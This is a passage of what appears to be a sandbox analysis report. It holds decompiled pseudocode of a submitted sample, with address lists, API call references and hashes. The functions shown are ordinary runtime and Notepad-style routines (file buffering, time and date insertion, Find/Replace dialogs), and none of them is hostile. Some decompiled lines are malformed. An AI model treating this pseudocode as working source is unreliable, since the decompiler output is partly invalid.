					_t92 = _a8;
					_t45 = E010A66B0(_t92);
					_t2 = _t92 + 0xc; // 0x66ce7cf0
					_t74 =  *_t2;
					_t89 = _t45;
					__eflags = _t74 & 0x00000082;
					if((_t74 & 0x00000082) != 0) {
						__eflags = _t74 & 0x00000040;
						if((_t74 & 0x00000040) == 0) {
							_t70 = 0;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								L10:
								_t16 = _t92 + 0xc; // 0x66ce7cf0
								_t48 =  *_t16 & 0xffffffef | 0x00000002;
								 *(_t92 + 0xc) = _t48;
								 *(_t92 + 4) = _t70;
								__eflags = _t48 & 0x0000010c;
								if((_t48 & 0x0000010c) == 0) {
									_t60 = E010A4BEE();
									__eflags = _t92 - _t60 + 0x20;
									if(_t92 == _t60 + 0x20) {
										L13:
										_t62 = E010AE41E(_t89);
										__eflags = _t62;
										if(_t62 == 0) {
											goto L14;
										}
									} else {
										_t64 = E010A4BEE();
										__eflags = _t92 - _t64 + 0x40;
										if(_t92 != _t64 + 0x40) {
											L14:
											E010AE1D7(_t92);
										} else {
											goto L13;
										}
									}
								}
								__eflags =  *(_t92 + 0xc) & 0x00000108;
								if(( *(_t92 + 0xc) & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_v8 = 1;
									_push( &_a4);
									_push(_t89);
									_t45 = E010A9CE9(_t70, _t86, _t89, _t92, 1);
									_t70 = _t45;
									goto L27;
								} else {
									_t24 = _t92 + 8; // 0x753b46c6
									_t87 =  *_t24;
									_t25 = _t87 + 1; // 0x753b46c7
									 *_t92 = _t25;
									_t26 = _t92 + 0x18; // 0x8b0d78fe
									_t76 =  *_t92 - _t87;
									_v8 = _t76;
									 *(_t92 + 4) =  *_t26 - 1;
									__eflags = _t76;
									if(__eflags <= 0) {
										__eflags = _t89 - 0xffffffff;
										if(_t89 == 0xffffffff) {
											L22:
											_t77 = 0x10c1560;
										} else {
											__eflags = _t89 - 0xfffffffe;
											if(_t89 == 0xfffffffe) {
												goto L22;
											} else {
												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10c2de0 + (_t89 >> 5) * 4));
											}
										}
										__eflags =  *(_t77 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t70);
											_push(_t70);
											_push(_t89);
											_t45 = E010A7180(_t70, _t89, _t92, __eflags) & _t87;
											__eflags = _t45 - 0xffffffff;
											if(_t45 == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t76);
										_push(_t87);
										_push(_t89);
										_t70 = E010A9CE9(_t70, _t87, _t89, _t92, __eflags);
										L25:
										_t35 = _t92 + 8; // 0x753b46c6
										_t45 = _a4;
										 *( *_t35) = _t45;
										L27:
										__eflags = _t70 - _v8;
										if(_t70 == _v8) {
											_t52 = _a4 & 0x000000ff;
										} else {
											L28:
											_t40 = _t92 + 0xc;
											 *_t40 =  *(_t92 + 0xc) | 0x00000020;
											__eflags =  *_t40;
											goto L29;
										}
									}
								}
							} else {
								 *(_t92 + 4) = 0;
								__eflags = _t74 & 0x00000010;
								if((_t74 & 0x00000010) == 0) {
									 *(_t92 + 0xc) = _t74 | 0x00000020;
									L29:
									_t52 = _t45 | 0xffffffff;
								} else {
									_t14 = _t92 + 8; // 0x753b46c6
									_t85 = _t74 & 0xfffffffe;
									__eflags = _t85;
									 *_t92 =  *_t14;
									 *(_t92 + 0xc) = _t85;
									goto L10;
								}
							}
						} else {
							_t67 = E010A6117();
							 *_t67 = 0x22;
							goto L6;
						}
					} else {
						_t67 = E010A6117();
						 *_t67 = 9;
						L6:
						 *(_t92 + 0xc) =  *(_t92 + 0xc) | 0x00000020;
						_t52 = _t67 | 0xffffffff;
					}
					return _t52;
				} else {
					return _t44 | 0xffffffff;
				}
			}


























                                                  0x010ab4ee
                                                  0x010ab4f5
                                                  0x010ab4fd
                                                  0x010ab502
                                                  0x010ab508
                                                  0x010ab508
                                                  0x010ab50b
                                                  0x010ab50d
                                                  0x010ab510
                                                  0x010ab51f
                                                  0x010ab522
                                                  0x010ab53c
                                                  0x010ab53e
                                                  0x010ab541
                                                  0x010ab556
                                                  0x010ab556
                                                  0x010ab55c
                                                  0x010ab55f
                                                  0x010ab562
                                                  0x010ab565
                                                  0x010ab56a
                                                  0x010ab56c
                                                  0x010ab574
                                                  0x010ab576
                                                  0x010ab584
                                                  0x010ab585
                                                  0x010ab58b
                                                  0x010ab58d
                                                  0x00000000
                                                  0x00000000
                                                  0x010ab578
                                                  0x010ab578
                                                  0x010ab580
                                                  0x010ab582
                                                  0x010ab58f
                                                  0x010ab590
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010ab582
                                                  0x010ab576
                                                  0x010ab596
                                                  0x010ab59d
                                                  0x010ab61b
                                                  0x010ab61c
                                                  0x010ab61d
                                                  0x010ab623
                                                  0x010ab624
                                                  0x010ab625
                                                  0x010ab62d
                                                  0x00000000
                                                  0x010ab59f
                                                  0x010ab59f
                                                  0x010ab59f
                                                  0x010ab5a4
                                                  0x010ab5a7
                                                  0x010ab5a9
                                                  0x010ab5ac
                                                  0x010ab5af
                                                  0x010ab5b2
                                                  0x010ab5b5
                                                  0x010ab5b7
                                                  0x010ab5d0
                                                  0x010ab5d3
                                                  0x010ab5f0
                                                  0x010ab5f0
                                                  0x010ab5d5
                                                  0x010ab5d5
                                                  0x010ab5d8
                                                  0x00000000
                                                  0x010ab5da
                                                  0x010ab5e7
                                                  0x010ab5e7
                                                  0x010ab5d8
                                                  0x010ab5f5
                                                  0x010ab5f9
                                                  0x00000000
                                                  0x010ab5fb
                                                  0x010ab5fb
                                                  0x010ab5fd
                                                  0x010ab5fe
                                                  0x010ab5ff
                                                  0x010ab605
                                                  0x010ab60a
                                                  0x010ab60d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010ab60d
                                                  0x010ab5b9
                                                  0x010ab5b9
                                                  0x010ab5ba
                                                  0x010ab5bb
                                                  0x010ab5c4
                                                  0x010ab60f
                                                  0x010ab60f
                                                  0x010ab612
                                                  0x010ab615
                                                  0x010ab62f
                                                  0x010ab62f
                                                  0x010ab632
                                                  0x010ab63d
                                                  0x010ab634
                                                  0x010ab634
                                                  0x010ab634
                                                  0x010ab634
                                                  0x010ab634
                                                  0x00000000
                                                  0x010ab634
                                                  0x010ab632
                                                  0x010ab5b7
                                                  0x010ab543
                                                  0x010ab543
                                                  0x010ab546
                                                  0x010ab549
                                                  0x010ab5cb
                                                  0x010ab638
                                                  0x010ab638
                                                  0x010ab54b
                                                  0x010ab54b
                                                  0x010ab54e
                                                  0x010ab54e
                                                  0x010ab551
                                                  0x010ab553
                                                  0x00000000
                                                  0x010ab553
                                                  0x010ab549
                                                  0x010ab524
                                                  0x010ab524
                                                  0x010ab529
                                                  0x00000000
                                                  0x010ab529
                                                  0x010ab512
                                                  0x010ab512
                                                  0x010ab517
                                                  0x010ab52f
                                                  0x010ab52f
                                                  0x010ab533
                                                  0x010ab533
                                                  0x010ab645
                                                  0x010ab4f7
                                                  0x010ab4fb
                                                  0x010ab4fb

                                                  APIs
                                                  • __ioinit.LIBCMT ref: 010AB4EE
                                                    • Part of subcall function 010A732B: InitOnceExecuteOnce.KERNEL32(010C27C0,010A7366,00000000,00000000,010B310F,00000109), ref: 010A7339
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Once$ExecuteInit__ioinit
                                                  • String ID:
                                                  • API String ID: 129814473-0
                                                  • Opcode ID: fe7d6689cbcf94f5ab8ce13beed21dd6a65b92488d2be3f12938d8bd378e3ab3
                                                  • Instruction ID: a1bd2350afacca97252c58100902b6f9b40510d43ea01d561ca521fc01868a7b
                                                  • Opcode Fuzzy Hash: fe7d6689cbcf94f5ab8ce13beed21dd6a65b92488d2be3f12938d8bd378e3ab3
                                                  • Instruction Fuzzy Hash: 3D41F1B1500B069ED7249FFDC891BBA7BE49F49330B88875DD9E6C72D1E678E8008B10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A15A0 Relevance: 9.1, APIs: 6, Instructions: 70windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A15A0(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				void* _v524;
				void* _t10;
				int _t16;
				void* _t18;
				struct HWND__* _t19;
				unsigned int _t23;
				long _t25;

				_t10 = _a8 - 0x4e;
				if(_t10 == 0) {
					if( *((intOrPtr*)(_a16 + 8)) == 0xfffffda6 &&  *0x10c4c8c != 0) {
						SendMessageW(GetParent(_a4), 0x465, 0,  &_v524);
						_t16 = E010A14B0( &_v524);
						if(_t16 != 0xffffffff) {
							 *0x10c4c88 = _t16;
							SendMessageW( *0x10c2db0, 0x14e, _t16, 0);
						}
					}
					goto L11;
				} else {
					_t18 = _t10 - 0xc2;
					if(_t18 == 0) {
						_t19 = GetDlgItem(_a4, 0x191);
						 *0x10c2db0 = _t19;
						SendMessageW(_t19, 0x14e,  *0x10c4c88, 0);
						return 0;
					} else {
						if(_t18 != 1) {
							L11:
							return 0;
						} else {
							_t23 = _a12;
							if(_t23 != 0x191 || _t23 >> 0x10 != 1) {
								goto L11;
							} else {
								_t25 = SendMessageW( *0x10c2db0, 0x147, 0, 0);
								_t26 =  ==  ? 0 : _t25;
								 *0x10c4c88 =  ==  ? 0 : _t25;
								return 0;
							}
						}
					}
				}
			}










                                                  0x010a15ac
                                                  0x010a15af
                                                  0x010a1643
                                                  0x010a1666
                                                  0x010a1672
                                                  0x010a167a
                                                  0x010a168a
                                                  0x010a168f
                                                  0x010a168f
                                                  0x010a167a
                                                  0x00000000
                                                  0x010a15b5
                                                  0x010a15b5
                                                  0x010a15ba
                                                  0x010a1612
                                                  0x010a1620
                                                  0x010a162b
                                                  0x010a1636
                                                  0x010a15bc
                                                  0x010a15bd
                                                  0x010a1695
                                                  0x010a169a
                                                  0x010a15c3
                                                  0x010a15c3
                                                  0x010a15ce
                                                  0x00000000
                                                  0x010a15e0
                                                  0x010a15ef
                                                  0x010a15fa
                                                  0x010a15fd
                                                  0x010a1607
                                                  0x010a1607
                                                  0x010a15ce
                                                  0x010a15bd
                                                  0x010a15ba

                                                  APIs
                                                  • SendMessageW.USER32(00000147,00000000,00000000), ref: 010A15EF
                                                  • GetDlgItem.USER32 ref: 010A1612
                                                  • SendMessageW.USER32(00000000,0000014E,00000000), ref: 010A162B
                                                  • GetParent.USER32(FFFFFDA6), ref: 010A165F
                                                  • SendMessageW.USER32(00000000), ref: 010A1666
                                                  • SendMessageW.USER32(0000014E,00000000,00000000), ref: 010A168F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$ItemParent
                                                  • String ID:
                                                  • API String ID: 2505470899-0
                                                  • Opcode ID: 2b614df32be0d711eba06838be48d0770797ecde824322c275039f576f0b5560
                                                  • Instruction ID: 6df2e01c03821161c55812c6b3c2245439df1d4947eced577bd5f408d4baee9d
                                                  • Opcode Fuzzy Hash: 2b614df32be0d711eba06838be48d0770797ecde824322c275039f576f0b5560
                                                  • Instruction Fuzzy Hash: 5A21C330200208AFEB709FB8DD89BA93BE4E708711F444652F9D8DA1E5EB7698508F14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A2150 Relevance: 9.0, APIs: 6, Instructions: 47windowtimeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A2150() {
				struct _SYSTEMTIME _v20;
				void* _v532;

				GetLocalTime( &_v20);
				GetTimeFormatW(0x400, 2,  &_v20, 0,  &_v532, 0xff);
				SendMessageW( *0x10c3f2c, 0xc2, 1,  &_v532);
				SendMessageW( *0x10c3f2c, 0xc2, 1, " ");
				GetDateFormatW(0x400, 0,  &_v20, 0,  &_v532, 0xff);
				return SendMessageW( *0x10c3f2c, 0xc2, 1,  &_v532);
			}





                                                  0x010a215e
                                                  0x010a217d
                                                  0x010a219d
                                                  0x010a21b1
                                                  0x010a21cc
                                                  0x010a21ec

                                                  APIs
                                                  • GetLocalTime.KERNEL32(00000000,0001FB2C), ref: 010A215E
                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,00000000,00000000,?,000000FF), ref: 010A217D
                                                  • SendMessageW.USER32(000000C2,00000001,?), ref: 010A219D
                                                  • SendMessageW.USER32(000000C2,00000001,010BEDFC), ref: 010A21B1
                                                  • GetDateFormatW.KERNEL32(00000400,00000000,00000000,00000000,?,000000FF), ref: 010A21CC
                                                  • SendMessageW.USER32(000000C2,00000001,?), ref: 010A21E6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$FormatTime$DateLocal
                                                  • String ID:
                                                  • API String ID: 3786825601-0
                                                  • Opcode ID: 4c53d80ad96bfb725ab84d6737266984cd0e07f0c1d4e6ebcd1291552bf2d7b2
                                                  • Instruction ID: 51cc3ee393fc0099b39dce032dd071cfa4b8e262eeb9e25468842e6ea0398814
                                                  • Opcode Fuzzy Hash: 4c53d80ad96bfb725ab84d6737266984cd0e07f0c1d4e6ebcd1291552bf2d7b2
                                                  • Instruction Fuzzy Hash: 0201087269021EBAFB30EB90DC8AFFA7B7CEB04B00F444865B754AA0C0D6E659458B51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A24AC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 44%
                                                  			E010A24AC(void* __ebx) {
				struct HWND__* _t1;
				void* _t5;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t12;

				_t9 = __ebx + 1;
				asm("int3");
				asm("int3");
				_t1 =  *0x10c3f28;
				if(_t1 == 0) {
					asm("xorps xmm0, xmm0");
					asm("movq [0x10c50bc], xmm0");
					 *0x10c50c0 =  *0x10c3f24;
					asm("movq [0x10c50c4], xmm0");
					 *0x10c50c4 =  *0x10c3f20;
					asm("movq [0x10c50cc], xmm0");
					asm("movq [0x10c50d4], xmm0");
					asm("movq [0x10c50dc], xmm0");
					0x10c50bc->lStructSize = 0x28;
					 *0x10c50cc = 0x10c3fa0;
					 *0x10c50d4 = 0;
					 *0x10c50d0 = 0x10c41a8;
					 *0x10c50c8 = 0x10001;
					_t5 = ReplaceTextW(0x10c50bc);
					 *0x10c3f28 = _t5;
					__eflags = _t5;
					if(__eflags == 0) {
						_push(0x563);
						return E010A2DDC(_t9, _t10, _t11, _t12, __eflags, L"Globals.hFindReplaceDlg != 0", L"main.c");
					}
					return _t5;
				} else {
					return SetActiveWindow(_t1);
				}
			}









                                                  0x010a24ac
                                                  0x010a24ae
                                                  0x010a24af
                                                  0x010a24b0
                                                  0x010a24b7
                                                  0x010a24c6
                                                  0x010a24c9
                                                  0x010a24d1
                                                  0x010a24db
                                                  0x010a24e3
                                                  0x010a24e8
                                                  0x010a24f2
                                                  0x010a24ff
                                                  0x010a2507
                                                  0x010a2511
                                                  0x010a251b
                                                  0x010a2520
                                                  0x010a252a
                                                  0x010a2534
                                                  0x010a253a
                                                  0x010a253f
                                                  0x010a2541
                                                  0x010a2543
                                                  0x00000000
                                                  0x010a2557
                                                  0x010a255a
                                                  0x010a24b9
                                                  0x010a24c0
                                                  0x010a24c0

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: ActiveReplaceTextWindow__wassert
                                                  • String ID: Globals.hFindReplaceDlg != 0$main.c
                                                  • API String ID: 172568423-3286657855
                                                  • Opcode ID: 6d23a6f575fb29b8f6ed9906f848d6bb661b8b10f1aad2351573576c110f220f
                                                  • Instruction ID: 2873199ecd9aab7e5cd1c5d3b4e0964ac411e1baf94780f30124e90bafac16c5
                                                  • Opcode Fuzzy Hash: 6d23a6f575fb29b8f6ed9906f848d6bb661b8b10f1aad2351573576c110f220f
                                                  • Instruction Fuzzy Hash: 4A011E78B21302CED760CFA9EC8469937F0B7AA7007604619F5C4DB248E7BB70448F92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A23F5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 45%
                                                  			E010A23F5(struct HWND__* __eax) {
				void* _t5;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t11;

				if(__eax == 0) {
					asm("xorps xmm0, xmm0");
					asm("movq [0x10c50bc], xmm0");
					 *0x10c50c0 =  *0x10c3f24;
					asm("movq [0x10c50c4], xmm0");
					 *0x10c50c4 =  *0x10c3f20;
					asm("movq [0x10c50cc], xmm0");
					asm("movq [0x10c50d4], xmm0");
					asm("movq [0x10c50dc], xmm0");
					 *0x10c50bc = 0x28;
					 *0x10c50cc = 0x10c3fa0;
					 *0x10c50d4 = 0;
					 *0x10c50c8 = 0x10001;
					_t5 = FindTextW(0x10c50bc);
					 *0x10c3f28 = _t5;
					__eflags = _t5;
					if(__eflags == 0) {
						_push(0x541);
						return E010A2DDC(_t8, _t9, _t10, _t11, __eflags, L"Globals.hFindReplaceDlg != 0", L"main.c");
					}
					return _t5;
				} else {
					return SetActiveWindow(__eax);
				}
			}








                                                  0x010a23f7
                                                  0x010a2406
                                                  0x010a2409
                                                  0x010a2411
                                                  0x010a241b
                                                  0x010a2423
                                                  0x010a242a
                                                  0x010a2432
                                                  0x010a243f
                                                  0x010a2447
                                                  0x010a2451
                                                  0x010a245b
                                                  0x010a2461
                                                  0x010a246b
                                                  0x010a2471
                                                  0x010a2476
                                                  0x010a2478
                                                  0x010a247a
                                                  0x00000000
                                                  0x010a248e
                                                  0x010a2491
                                                  0x010a23f9
                                                  0x010a2400
                                                  0x010a2400

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: ActiveFindTextWindow__wassert
                                                  • String ID: Globals.hFindReplaceDlg != 0$main.c
                                                  • API String ID: 1223664302-3286657855
                                                  • Opcode ID: a222e0431ceba654ee954129b860e64573e60251c55e6d7f8cc393ad5068e298
                                                  • Instruction ID: 1be37648399eb3f74a3eb7ffc5055167b63b6c9fe264c08a227821bb027acbb4
                                                  • Opcode Fuzzy Hash: a222e0431ceba654ee954129b860e64573e60251c55e6d7f8cc393ad5068e298
                                                  • Instruction Fuzzy Hash: A1011D79B21703CED720DFA5ED8419936B0B76A3007608619F5C4DA208E7BF70848F92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A35B7 Relevance: 7.7, APIs: 5, Instructions: 162COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 69%
                                                  			E010A35B7(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E010A66E0(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E010A6582(_t98, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(_a8 != 0xffffffff) {
													E010A66E0(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E010A6117())) = 0x22;
												L4:
												E010A4035();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v8 = _t110 + 1;
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E010A66B0(_t119));
											_t88 = E010A6885();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E010A40B0(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t120 = _t120 + 0x10;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E010A6117())) = 0x16;
				goto L4;
			}




























                                                  0x010a35c1
                                                  0x010a35c4
                                                  0x010a35ca
                                                  0x010a35cd
                                                  0x010a35d0
                                                  0x010a35ed
                                                  0x00000000
                                                  0x010a35ed
                                                  0x010a35d2
                                                  0x010a35d7
                                                  0x00000000
                                                  0x00000000
                                                  0x010a35db
                                                  0x010a35f4
                                                  0x010a35f7
                                                  0x010a35f9
                                                  0x010a3607
                                                  0x010a3607
                                                  0x010a360b
                                                  0x010a3613
                                                  0x010a3618
                                                  0x010a3618
                                                  0x010a361b
                                                  0x010a361d
                                                  0x00000000
                                                  0x010a361f
                                                  0x010a361f
                                                  0x010a3627
                                                  0x010a3629
                                                  0x00000000
                                                  0x00000000
                                                  0x010a362b
                                                  0x010a362e
                                                  0x010a3631
                                                  0x010a3638
                                                  0x010a363a
                                                  0x010a3641
                                                  0x010a363c
                                                  0x010a363c
                                                  0x010a363c
                                                  0x010a3646
                                                  0x010a3649
                                                  0x010a364b
                                                  0x010a3734
                                                  0x00000000
                                                  0x010a3651
                                                  0x010a3651
                                                  0x010a3651
                                                  0x010a3658
                                                  0x010a3699
                                                  0x010a3699
                                                  0x010a369b
                                                  0x010a3706
                                                  0x010a370c
                                                  0x010a370f
                                                  0x010a3766
                                                  0x00000000
                                                  0x010a376c
                                                  0x010a3711
                                                  0x010a3714
                                                  0x010a3716
                                                  0x010a373c
                                                  0x010a373c
                                                  0x010a3740
                                                  0x010a374a
                                                  0x010a374f
                                                  0x010a3757
                                                  0x010a35e8
                                                  0x010a35e8
                                                  0x00000000
                                                  0x010a35e8
                                                  0x010a3718
                                                  0x010a371b
                                                  0x010a371e
                                                  0x010a371f
                                                  0x010a371f
                                                  0x010a3720
                                                  0x010a3723
                                                  0x010a3726
                                                  0x010a3729
                                                  0x00000000
                                                  0x010a3729
                                                  0x010a369d
                                                  0x010a369f
                                                  0x010a36c3
                                                  0x010a36c8
                                                  0x010a36ce
                                                  0x010a36d0
                                                  0x010a36d0
                                                  0x010a36a1
                                                  0x010a36a3
                                                  0x010a36a9
                                                  0x010a36bb
                                                  0x010a36bb
                                                  0x010a36bb
                                                  0x010a36bd
                                                  0x010a36ab
                                                  0x010a36b0
                                                  0x010a36b2
                                                  0x010a36b2
                                                  0x010a36bf
                                                  0x010a36bf
                                                  0x010a36d2
                                                  0x010a36d5
                                                  0x00000000
                                                  0x010a36d7
                                                  0x010a36d7
                                                  0x010a36d8
                                                  0x010a36e2
                                                  0x010a36e3
                                                  0x010a36e8
                                                  0x010a36eb
                                                  0x010a36ed
                                                  0x010a3774
                                                  0x00000000
                                                  0x010a3774
                                                  0x010a36f3
                                                  0x010a36f6
                                                  0x010a3762
                                                  0x010a3762
                                                  0x010a3762
                                                  0x010a3762
                                                  0x00000000
                                                  0x010a3762
                                                  0x010a36f8
                                                  0x010a36f8
                                                  0x010a36fa
                                                  0x010a36fa
                                                  0x010a36fd
                                                  0x010a3700
